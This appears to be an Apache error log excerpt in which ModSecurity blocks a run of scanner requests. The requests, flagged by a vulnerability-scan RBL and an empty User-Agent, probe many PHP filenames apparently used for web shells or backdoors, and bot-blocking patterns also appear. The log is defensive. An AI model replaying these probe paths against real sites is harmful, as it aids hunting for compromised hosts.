[Tue May 26 19:06:58.360431 2026] [security2:error] [pid 6038:tid 6214] [client 20.104.227.76:10712] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/xs.php"] [unique_id "ahWh-lHA3ZmGrHHEr4qiPwAAALM"]
[Tue May 26 19:06:58.438123 2026] [security2:error] [pid 6038:tid 6151] [remote 142.44.228.171:50002] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "masonicarkfoundation.in"] [uri "/"] [unique_id "ahWh-lHA3ZmGrHHEr4qiQwAAkXA"]
[Tue May 26 19:06:58.438267 2026] [security2:error] [pid 6038:tid 6180] [client 142.44.228.171:50002] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "masonicarkfoundation.in"] [uri "/"] [unique_id "ahWh-lHA3ZmGrHHEr4qiQwAAkXA"]
[Tue May 26 19:06:58.538049 2026] [security2:error] [pid 6038:tid 6264] [client 20.104.227.76:10323] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/xxa.php"] [unique_id "ahWh-lHA3ZmGrHHEr4qiRQAAAOU"]
[Tue May 26 19:06:58.538184 2026] [security2:error] [pid 6038:tid 6264] [client 20.104.227.76:10323] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/xxa.php"] [unique_id "ahWh-lHA3ZmGrHHEr4qiRQAAAOU"]
[Tue May 26 19:06:58.700533 2026] [security2:error] [pid 6038:tid 6292] [client 20.104.227.76:10353] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/index0.php"] [unique_id "ahWh-lHA3ZmGrHHEr4qiTwAAAQE"]
[Tue May 26 19:06:58.700648 2026] [security2:error] [pid 6038:tid 6292] [client 20.104.227.76:10353] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/index0.php"] [unique_id "ahWh-lHA3ZmGrHHEr4qiTwAAAQE"]
[Tue May 26 19:06:58.872641 2026] [security2:error] [pid 6038:tid 6188] [client 20.104.227.76:8338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/wp-kz.php"] [unique_id "ahWh-lHA3ZmGrHHEr4qiUwAAAJk"]
[Tue May 26 19:06:58.872740 2026] [security2:error] [pid 6038:tid 6188] [client 20.104.227.76:8338] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/wp-kz.php"] [unique_id "ahWh-lHA3ZmGrHHEr4qiUwAAAJk"]
[Tue May 26 19:06:59.026767 2026] [security2:error] [pid 6038:tid 6266] [client 20.104.227.76:10333] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/19.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qiWQAAAOc"]
[Tue May 26 19:06:59.026881 2026] [security2:error] [pid 6038:tid 6266] [client 20.104.227.76:10333] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/19.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qiWQAAAOc"]
[Tue May 26 19:06:59.176900 2026] [security2:error] [pid 6038:tid 6205] [client 20.104.227.76:10349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/11.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qiWgAAAKo"]
[Tue May 26 19:06:59.176980 2026] [security2:error] [pid 6038:tid 6205] [client 20.104.227.76:10349] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/11.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qiWgAAAKo"]
[Tue May 26 19:06:59.233538 2026] [security2:error] [pid 6038:tid 6218] [client 20.12.190.196:38431] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/zoo.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qiYQAAALc"]
[Tue May 26 19:06:59.233681 2026] [security2:error] [pid 6038:tid 6218] [client 20.12.190.196:38431] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/zoo.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qiYQAAALc"]
[Tue May 26 19:06:59.328370 2026] [security2:error] [pid 6038:tid 6202] [client 20.104.227.76:8369] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/w.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qiYgAAAKc"]
[Tue May 26 19:06:59.328488 2026] [security2:error] [pid 6038:tid 6202] [client 20.104.227.76:8369] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/w.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qiYgAAAKc"]
[Tue May 26 19:06:59.478224 2026] [security2:error] [pid 6038:tid 6256] [client 20.104.227.76:8335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/ws78.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qiYwAAAN0"]
[Tue May 26 19:06:59.478355 2026] [security2:error] [pid 6038:tid 6256] [client 20.104.227.76:8335] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/ws78.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qiYwAAAN0"]
[Tue May 26 19:06:59.630530 2026] [security2:error] [pid 6038:tid 6172] [client 20.104.227.76:10352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/xxx.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qiZwAAAIk"]
[Tue May 26 19:06:59.630668 2026] [security2:error] [pid 6038:tid 6172] [client 20.104.227.76:10352] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/xxx.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qiZwAAAIk"]
[Tue May 26 19:06:59.686214 2026] [security2:error] [pid 6038:tid 6293] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qiYAAAAQI"]
[Tue May 26 19:06:59.792770 2026] [security2:error] [pid 6038:tid 6237] [client 20.104.227.76:8332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/a7.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qicwAAAMo"]
[Tue May 26 19:06:59.792900 2026] [security2:error] [pid 6038:tid 6237] [client 20.104.227.76:8332] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/a7.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qicwAAAMo"]
[Tue May 26 19:06:59.832995 2026] [security2:error] [pid 6038:tid 6247] [client 114.119.140.190:53195] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "triviewsolutions.com"] [uri "/portfolio.html"] [unique_id "ahWh-1HA3ZmGrHHEr4qidAAAANQ"], referer: http://triviewsolutions.com/index.html
[Tue May 26 19:06:59.936027 2026] [security2:error] [pid 6038:tid 6270] [client 20.104.227.76:8321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/BDKR28WP.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qidQAAAOs"]
[Tue May 26 19:06:59.936131 2026] [security2:error] [pid 6038:tid 6270] [client 20.104.227.76:8321] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/BDKR28WP.php"] [unique_id "ahWh-1HA3ZmGrHHEr4qidQAAAOs"]
[Tue May 26 19:07:00.118609 2026] [security2:error] [pid 6038:tid 6242] [client 20.104.227.76:10336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/a1.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qidwAAAM8"]
[Tue May 26 19:07:00.118733 2026] [security2:error] [pid 6038:tid 6242] [client 20.104.227.76:10336] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/a1.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qidwAAAM8"]
[Tue May 26 19:07:00.150523 2026] [fcgid:warn] [pid 6038:tid 6263] (70014)End of file found: [client 66.132.195.92:62136] mod_fcgid: can't get data from http client
[Tue May 26 19:07:00.292966 2026] [security2:error] [pid 6038:tid 6230] [client 20.104.227.76:10359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/d.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qigAAAAMM"]
[Tue May 26 19:07:00.293099 2026] [security2:error] [pid 6038:tid 6230] [client 20.104.227.76:10359] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/d.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qigAAAAMM"]
[Tue May 26 19:07:00.446594 2026] [security2:error] [pid 6038:tid 6213] [client 20.104.227.76:8324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/xff.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qihAAAALI"]
[Tue May 26 19:07:00.446717 2026] [security2:error] [pid 6038:tid 6213] [client 20.104.227.76:8324] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/xff.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qihAAAALI"]
[Tue May 26 19:07:00.597727 2026] [security2:error] [pid 6038:tid 6229] [client 20.104.227.76:8355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/xltt.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qijgAAAMI"]
[Tue May 26 19:07:00.597853 2026] [security2:error] [pid 6038:tid 6229] [client 20.104.227.76:8355] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/xltt.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qijgAAAMI"]
[Tue May 26 19:07:00.755516 2026] [security2:error] [pid 6038:tid 6218] [client 20.12.190.196:14149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/wp-link-spm.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qikgAAALc"]
[Tue May 26 19:07:00.755664 2026] [security2:error] [pid 6038:tid 6218] [client 20.12.190.196:14149] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/wp-link-spm.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qikgAAALc"]
[Tue May 26 19:07:00.776484 2026] [security2:error] [pid 6038:tid 6187] [client 20.104.227.76:8328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/son.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qikwAAAJg"]
[Tue May 26 19:07:00.776751 2026] [security2:error] [pid 6038:tid 6187] [client 20.104.227.76:8328] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/son.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qikwAAAJg"]
[Tue May 26 19:07:00.869500 2026] [autoindex:error] [pid 6038:tid 6290] [client 66.132.195.92:62146] AH01276: Cannot serve directory /home2/azurm42s/clicshopping.azurmediatec.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:07:00.921894 2026] [security2:error] [pid 6038:tid 6250] [client 20.104.227.76:8329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/doc.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qinAAAANc"]
[Tue May 26 19:07:00.921980 2026] [security2:error] [pid 6038:tid 6250] [client 20.104.227.76:8329] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/doc.php"] [unique_id "ahWh_FHA3ZmGrHHEr4qinAAAANc"]
[Tue May 26 19:07:01.091001 2026] [security2:error] [pid 6038:tid 6241] [client 20.104.227.76:10335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/zo.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qiowAAAM4"]
[Tue May 26 19:07:01.091103 2026] [security2:error] [pid 6038:tid 6241] [client 20.104.227.76:10335] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/zo.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qiowAAAM4"]
[Tue May 26 19:07:01.238016 2026] [security2:error] [pid 6038:tid 6294] [client 20.104.227.76:10360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/xper1.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qipwAAAQM"]
[Tue May 26 19:07:01.238107 2026] [security2:error] [pid 6038:tid 6294] [client 20.104.227.76:10360] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/xper1.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qipwAAAQM"]
[Tue May 26 19:07:01.402825 2026] [security2:error] [pid 6038:tid 6222] [client 20.104.227.76:10311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/tiny.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qirAAAALs"]
[Tue May 26 19:07:01.402925 2026] [security2:error] [pid 6038:tid 6222] [client 20.104.227.76:10311] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/tiny.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qirAAAALs"]
[Tue May 26 19:07:01.545252 2026] [security2:error] [pid 6038:tid 6291] [client 20.104.227.76:8354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/s1.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qiswAAAQA"]
[Tue May 26 19:07:01.545408 2026] [security2:error] [pid 6038:tid 6291] [client 20.104.227.76:8354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/s1.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qiswAAAQA"]
[Tue May 26 19:07:01.695244 2026] [security2:error] [pid 6038:tid 6211] [client 20.104.227.76:10356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/de.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qitQAAALA"]
[Tue May 26 19:07:01.695352 2026] [security2:error] [pid 6038:tid 6211] [client 20.104.227.76:10356] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/de.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qitQAAALA"]
[Tue May 26 19:07:01.845086 2026] [security2:error] [pid 6038:tid 6210] [client 20.104.227.76:8325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/1a.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qiuwAAAK8"]
[Tue May 26 19:07:01.845216 2026] [security2:error] [pid 6038:tid 6210] [client 20.104.227.76:8325] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/1a.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qiuwAAAK8"]
[Tue May 26 19:07:01.966649 2026] [security2:error] [pid 6038:tid 6173] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qisgAAAIo"]
[Tue May 26 19:07:01.971438 2026] [security2:error] [pid 6038:tid 6219] [client 20.12.190.196:7905] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/wp-link-snpm.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qivwAAALg"]
[Tue May 26 19:07:01.971534 2026] [security2:error] [pid 6038:tid 6219] [client 20.12.190.196:7905] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "com.md-74.webhostbox.net"] [uri "/wp-link-snpm.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qivwAAALg"]
[Tue May 26 19:07:01.997211 2026] [security2:error] [pid 6038:tid 6231] [client 20.104.227.76:10364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/2.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qiwAAAAMQ"]
[Tue May 26 19:07:01.997380 2026] [security2:error] [pid 6038:tid 6231] [client 20.104.227.76:10364] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/2.php"] [unique_id "ahWh_VHA3ZmGrHHEr4qiwAAAAMQ"]
[Tue May 26 19:07:02.150343 2026] [security2:error] [pid 6038:tid 6200] [client 20.104.227.76:8330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/sky.php"] [unique_id "ahWh_lHA3ZmGrHHEr4qixQAAAKU"]
[Tue May 26 19:07:02.150490 2026] [security2:error] [pid 6038:tid 6200] [client 20.104.227.76:8330] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "usai.glorodavionics.com"] [uri "/sky.php"] [unique_id "ahWh_lHA3ZmGrHHEr4qixQAAAKU"]
[Tue May 26 19:07:02.314295 2026] [security2:error] [pid 6038:tid 6197] [client 20.104.227.76:10693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usai.glorodavionics.com"] [uri "/man.php"] [unique_id "ahWh_lHA3ZmGrHHEr4qizAAAAKI"]
